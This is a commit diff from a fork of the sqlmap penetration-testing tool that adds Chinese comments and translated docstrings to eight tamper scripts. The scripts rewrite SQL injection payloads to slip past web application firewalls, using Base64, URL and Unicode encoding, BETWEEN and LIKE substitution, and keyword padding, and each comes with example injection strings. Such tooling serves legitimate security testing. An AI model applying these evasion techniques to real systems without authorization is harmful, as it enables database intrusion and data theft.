ptnqoxywl
/
sqlmap
1
0
Fork 1
Code Issues Pull Requests 1 Packages Projects Releases Wiki Activity

修改

Browse Source
shichengkun_branch
sck 2 months ago
parent 8d2bd8e457
commit 7486672d56
8 changed files with 196 additions and 130 deletions
Show Stats Download Patch File Download Diff File

24
src/sqlmap-master/tamper/base64encode.py
Unescape View File

@ -5,20 +5,28 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from lib.core.convert import encodeBase64 from lib.core.convert import encodeBase64 # 导入Base64编码函数
from lib.core.enums import PRIORITY from lib.core.enums import PRIORITY # 导入优先级枚举
__priority__ = PRIORITY.LOW __priority__ = PRIORITY.LOW # 设置优先级为低
def dependencies(): def dependencies():
pass pass
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Base64-encodes all characters in a given payload 这个函数用于篡改tamper输入的payload将所有字符进行Base64编码
参数
payload要篡改的原始payload
**kwargs其他可选参数在本函数中未使用
功能
对输入的payload进行Base64编码这可以用于绕过某些对特殊字符有限制的安全防护措施
>>> tamper("1' AND SLEEP(5)#") 示例
'MScgQU5EIFNMRUVQKDUpIw==' >>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
""" """
return encodeBase64(payload, binary=False) if payload else payload return encodeBase64(payload, binary=False) if payload else payload # 如果payload不为空则对其进行Base64编码binary=False表示结果为ASCII字符串

52
src/sqlmap-master/tamper/between.py
Unescape View File

@ -16,44 +16,46 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #' 这个函数用于篡改tamper输入的payload将大于操作符'>)替换为'NOT BETWEEN 0 AND #',将等于操作符('=')替换为'BETWEEN # AND #'。
Tested against: 测试情况
* Microsoft SQL Server 2005 * 微软 SQL Server 2005
* MySQL 4, 5.0 and 5.5 * MySQL 4, 5.0 5.5
* Oracle 10g * Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0 * PostgreSQL 8.3, 8.4, 9.0
Notes: 注意
* Useful to bypass weak and bespoke web application firewalls that * 这个替换很有用可以绕过那些只过滤大于字符的弱Web应用防火墙
filter the greater than character * BETWEEN子句是SQL标准因此这个tamper脚本应该适用于所有数据库
* The BETWEEN clause is SQL standard. Hence, this tamper script
should work against all (?) databases 示例
>>> tamper('1 AND A > B--')
>>> tamper('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--'
'1 AND A NOT BETWEEN 0 AND B--' >>> tamper('1 AND A = B--')
>>> tamper('1 AND A = B--') '1 AND A BETWEEN B AND B--'
'1 AND A BETWEEN B AND B--' >>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')
>>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()') '1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'
'1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'
""" """
retVal = payload
if payload: retVal = payload # 初始化返回值
if payload:# 如果payload不为空
# 使用正则表达式查找并替换大于操作符('>
match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload) match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload)
if match: if match: # 如果找到匹配项
_ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5)) _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5))
retVal = retVal.replace(match.group(0), _) retVal = retVal.replace(match.group(0), _) # 替换匹配项
else: else:
retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) # 替换大于操作符
if retVal == payload: if retVal == payload: # 如果返回值未改变,尝试替换等于操作符('=
match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload) match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload)
if match: if match:# 如果找到匹配项
_ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5)) _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))
retVal = retVal.replace(match.group(0), _) retVal = retVal.replace(match.group(0), _)# 替换匹配项
return retVal return retVal# 返回篡改后的payload

43
src/sqlmap-master/tamper/binary.py
Unescape View File

@ -16,28 +16,29 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Injects keyword binary where possible 这个函数用于篡改tamper输入的payload注入MySQL中的关键字'binary'以尝试绕过某些安全防护措施
Requirement: 要求
* MySQL * 仅适用于MySQL数据库
>>> tamper('1 UNION ALL SELECT NULL, NULL, NULL') 示例
'1 UNION ALL SELECT binary NULL, binary NULL, binary NULL' >>> tamper('1 UNION ALL SELECT NULL, NULL, NULL')
>>> tamper('1 AND 2>1') '1 UNION ALL SELECT binary NULL, binary NULL, binary NULL'
'1 AND binary 2>binary 1' >>> tamper('1 AND 2>1')
>>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END') '1 AND binary 2>binary 1'
'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END' >>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END')
'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END'
""" """
retVal = payload retVal = payload # 初始化返回值
if payload: if payload: # 如果payload不为空
retVal = re.sub(r"\bNULL\b", "binary NULL", retVal) retVal = re.sub(r"\bNULL\b", "binary NULL", retVal) # 替换NULL为binary NULL
retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal) retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal)# 在THEN和ELSE后的数字或十六进制值前添加binary关键字
retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal) retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal)# 在数字比较操作中添加binary关键字
retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal) retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal)# 在AND或OR条件后的数字前添加binary关键字
retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal) retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal)# 在比较操作符前的数字前添加binary关键字
retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal) retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal) # 在十六进制值前添加binary关键字
retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal) retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal) # 移除多余的binary关键字
return retVal return retVal # 返回篡改后的payload

38
src/sqlmap-master/tamper/bluecoat.py
Unescape View File

@ -5,11 +5,12 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import re import re# 导入正则表达式模块
from lib.core.data import kb from lib.core.data import kb # 导入知识库包含SQL关键字等信息
from lib.core.enums import PRIORITY from lib.core.enums import PRIORITY # 导入优先级枚举
# 设置优先级为普通
__priority__ = PRIORITY.NORMAL __priority__ = PRIORITY.NORMAL
def dependencies(): def dependencies():
@ -17,34 +18,45 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE 这个函数用于篡改tamper输入的payload通过替换空格字符和等号来绕过Blue Coat SGOS的WAF
Requirement: 功能
* Blue Coat SGOS with WAF activated as documented in * 将SQL语句后的空格替换为有效的随机空白字符
https://kb.bluecoat.com/index?page=content&id=FAQ2147 * 将等号=替换为LIKE操作符
Tested against: 要求
* Blue Coat SGOS且WAF已激活参考文档https://kb.bluecoat.com/index?page=content&id=FAQ2147
测试情况
* MySQL 5.1, SGOS * MySQL 5.1, SGOS
Notes: 注意
* Useful to bypass Blue Coat's recommended WAF rule configuration * 这个篡改方法对于绕过Blue Coat推荐的WAF规则配置很有用
>>> tamper('SELECT id FROM users WHERE id = 1') 示例
'SELECT%09id FROM%09users WHERE%09id LIKE 1' >>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
""" """
def process(match): def process(match):
"""
辅助函数用于处理正则匹配的结果
将匹配到的SQL关键字替换为带有%09制表符的版本
"""
word = match.group('word') word = match.group('word')
if word.upper() in kb.keywords: if word.upper() in kb.keywords:
return match.group().replace(word, "%s%%09" % word) return match.group().replace(word, "%s%%09" % word)
else: else:
return match.group() return match.group()
retVal = payload retVal = payload # 初始化返回值
if payload: if payload:
# 替换SQL关键字后跟非单词字符或字符串末尾的空格
retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", process, retVal) retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", process, retVal)
# 将等号替换为LIKE操作符
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
# 移除多余的%09空格
retVal = retVal.replace("%09 ", "%09") retVal = retVal.replace("%09 ", "%09")
return retVal return retVal

35
src/sqlmap-master/tamper/chardoubleencode.py
Unescape View File

@ -5,10 +5,11 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import string import string # 导入字符串处理模块
from lib.core.enums import PRIORITY from lib.core.enums import PRIORITY # 导入优先级枚举
# 设置优先级为低
__priority__ = PRIORITY.LOW __priority__ = PRIORITY.LOW
def dependencies(): def dependencies():
@ -16,27 +17,31 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554) 这个函数用于篡改tamper输入的payload通过双重URL编码所有字符不处理已经编码的字符
Notes: 注意
* Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset * 这个技术很有用可以绕过一些不进行双重URL解码的弱Web应用防火墙
>>> tamper('SELECT FIELD FROM%20TABLE') 示例
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' >>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
""" """
retVal = payload retVal = payload # 初始化返回值
if payload:
retVal = ""
i = 0
while i < len(payload): if payload: # 如果payload不为空
retVal = "" # 初始化返回值字符串
i = 0 # 初始化索引
while i < len(payload): # 遍历payload中的每个字符
# 如果当前字符是%且后面两个字符是十六进制数字(已编码的字符),则进行双重编码
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += '%%25%s' % payload[i + 1:i + 3] retVal += '%%25%s' % payload[i + 1:i + 3]
i += 3 i += 3 # 移动索引,跳过已处理的三个字符
else: else:
# 对未编码的字符进行双重URL编码
retVal += '%%25%.2X' % ord(payload[i]) retVal += '%%25%.2X' % ord(payload[i])
i += 1 i += 1 # 移动索引,处理下一个字符
return retVal return retVal # 返回篡改后的payload

49
src/sqlmap-master/tamper/charencode.py
Unescape View File

@ -5,45 +5,54 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import string import string # 导入字符串常量库,用于处理字符和十六进制数字
from lib.core.enums import PRIORITY from lib.core.enums import PRIORITY # 从核心库导入优先级枚举
__priority__ = PRIORITY.LOWEST __priority__ = PRIORITY.LOWEST# 设置优先级为最低
def dependencies(): def dependencies():
pass pass
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) 这个函数用于篡改tamper输入的payload通过URL编码所有字符不处理已经编码的字符
Tested against: 功能
* 将输入的SQL语句中的所有字符进行URL编码
* 例如'SELECT'转换为'%53%45%4C%45%43%54'
测试情况
* Microsoft SQL Server 2005 * Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5 * MySQL 4, 5.0 5.5
* Oracle 10g * Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0 * PostgreSQL 8.3, 8.4, 9.0
Notes: 注意
* Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset * 这个方法对于绕过一些非常弱的Web应用防火墙很有用这些防火墙在处理请求时不进行URL解码
* The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS * Web服务器会传递解码后的版本因此应该适用于任何数据库管理系统DBMS
>>> tamper('SELECT FIELD FROM%20TABLE') 示例
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' >>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
""" """
retVal = payload
if payload: retVal = payload # 初始化返回值为输入的payload
retVal = ""
i = 0
if payload: # 如果payload不为空
retVal = "" # 初始化返回值字符串
i = 0 # 初始化索引
# 遍历payload中的每个字符
while i < len(payload): while i < len(payload):
# 检查当前字符是否为%且后面两个字符是十六进制数字(已编码的字符)
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += payload[i:i + 3] retVal += payload[i:i + 3] # 如果是已编码的字符,直接添加到返回值
i += 3 i += 3 # 移动索引,跳过已处理的三个字符
else: else:
retVal += '%%%.2X' % ord(payload[i]) # 对未编码的字符进行URL编码并添加到返回值
i += 1 retVal += '%%%.2X' % ord(payload[i])# 将字符转换为其ASCII值的十六进制表示
i += 1 # 移动索引,处理下一个字符
return retVal return retVal # 返回篡改后的payload

48
src/sqlmap-master/tamper/charunicodeencode.py
Unescape View File

@ -8,46 +8,62 @@ See the file 'LICENSE' for copying permission
import os import os
import string import string
from lib.core.common import singleTimeWarnMessage from lib.core.common import singleTimeWarnMessage # 从核心库导入单次警告消息函数
from lib.core.enums import PRIORITY from lib.core.enums import PRIORITY # 从核心库导入优先级枚举
__priority__ = PRIORITY.LOWEST __priority__ = PRIORITY.LOWEST # 设置优先级为最低
def dependencies(): def dependencies():
"""
这个函数用于在运行时检查依赖关系并给出警告信息
功能
- 显示一条单次警告消息指出当前的tamper脚本仅适用于ASP或ASP.NET Web应用程序
"""
singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP or ASP.NET web applications" % os.path.basename(__file__).split(".")[0]) singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP or ASP.NET web applications" % os.path.basename(__file__).split(".")[0])
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) 这个函数用于篡改tamper输入的payload通过Unicode-URL编码所有字符不处理已经编码的字符
参数
payload要篡改的原始payload
**kwargs其他可选参数在本函数中未使用
功能
- 将输入的payload中的字符转换为Unicode-URL编码格式例如'SELECT'转换为'%u0053%u0045%u004C%u0045%u0043%u0054'
Requirement: 要求
* ASP * 仅适用于ASP和ASP.NET环境
* ASP.NET
Tested against: 测试情况
* Microsoft SQL Server 2000 * Microsoft SQL Server 2000
* Microsoft SQL Server 2005 * Microsoft SQL Server 2005
* MySQL 5.1.56 * MySQL 5.1.56
* PostgreSQL 9.0.3 * PostgreSQL 9.0.3
Notes: 注意
* Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset * 这个篡改方法对于绕过那些在处理请求前不进行Unicode URL解码的弱Web应用防火墙很有用
>>> tamper('SELECT FIELD%20FROM TABLE') 示例
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' >>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
""" """
retVal = payload retVal = payload # 初始化返回值为输入的payload
if payload: if payload: # 如果payload不为空
retVal = "" retVal = "" # 初始化返回值字符串
i = 0 i = 0 # 初始化索引
# 遍历payload中的每个字符
while i < len(payload): while i < len(payload):
# 如果当前字符是%且后面两个字符是十六进制数字已编码的字符则进行Unicode-URL编码
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += "%%u00%s" % payload[i + 1:i + 3] retVal += "%%u00%s" % payload[i + 1:i + 3]
i += 3 i += 3
else: else:
# 对未编码的字符进行Unicode-URL编码并添加到返回值
retVal += '%%u%.4X' % ord(payload[i]) retVal += '%%u%.4X' % ord(payload[i])
i += 1 i += 1

37
src/sqlmap-master/tamper/charunicodeescape.py
Unescape View File

@ -5,35 +5,48 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import string import string # 导入字符串常量库,用于处理字符和十六进制数字
from lib.core.enums import PRIORITY from lib.core.enums import PRIORITY # 从核心库导入优先级枚举
# 设置优先级为普通
__priority__ = PRIORITY.NORMAL __priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) 这个函数用于篡改tamper输入的payload通过Unicode转义非编码字符不处理已经编码的字符
Notes: 参数
* Useful to bypass weak filtering and/or WAFs in JSON contexes payload要篡改的原始payload
**kwargs其他可选参数在本函数中未使用
>>> tamper('SELECT FIELD FROM TABLE') 功能
'\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045' - 将输入的payload中的字符转换为Unicode转义序列例如'SELECT'转换为'\u0053\u0045\u004C\u0045\u0043\u0054'
注意
* 这个方法对于绕过在JSON上下文中的弱过滤和/或Web应用防火墙WAFs很有用
示例
>>> tamper('SELECT FIELD FROM TABLE')
'\\u0053\\u0045\\u004C\\u0045\\u0043\\u0054 \\u0020\\u0046\\u0049\\u0045\\u004C\\u0044 \\u0046\\u0052\\u004F\\u004D \\u0054\\u0041\\u0042\\u004C\\u0045'
""" """
retVal = payload retVal = payload # 初始化返回值为输入的payload
if payload: if payload: # 如果payload不为空
retVal = "" retVal = "" # 初始化返回值字符串
i = 0 i = 0 # 初始化索引
# 遍历payload中的每个字符
while i < len(payload): while i < len(payload):
# 如果当前字符是%且后面两个字符是十六进制数字已编码的字符则进行Unicode转义
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += "\\u00%s" % payload[i + 1:i + 3] retVal += "\\u00%s" % payload[i + 1:i + 3]
i += 3 i += 3
else: else:
# 对未编码的字符进行Unicode转义并添加到返回值
retVal += '\\u%.4X' % ord(payload[i]) retVal += '\\u%.4X' % ord(payload[i])
i += 1 i += 1 # 移动索引,处理下一个字符
return retVal return retVal

Write Preview
Loading…
Cancel
Save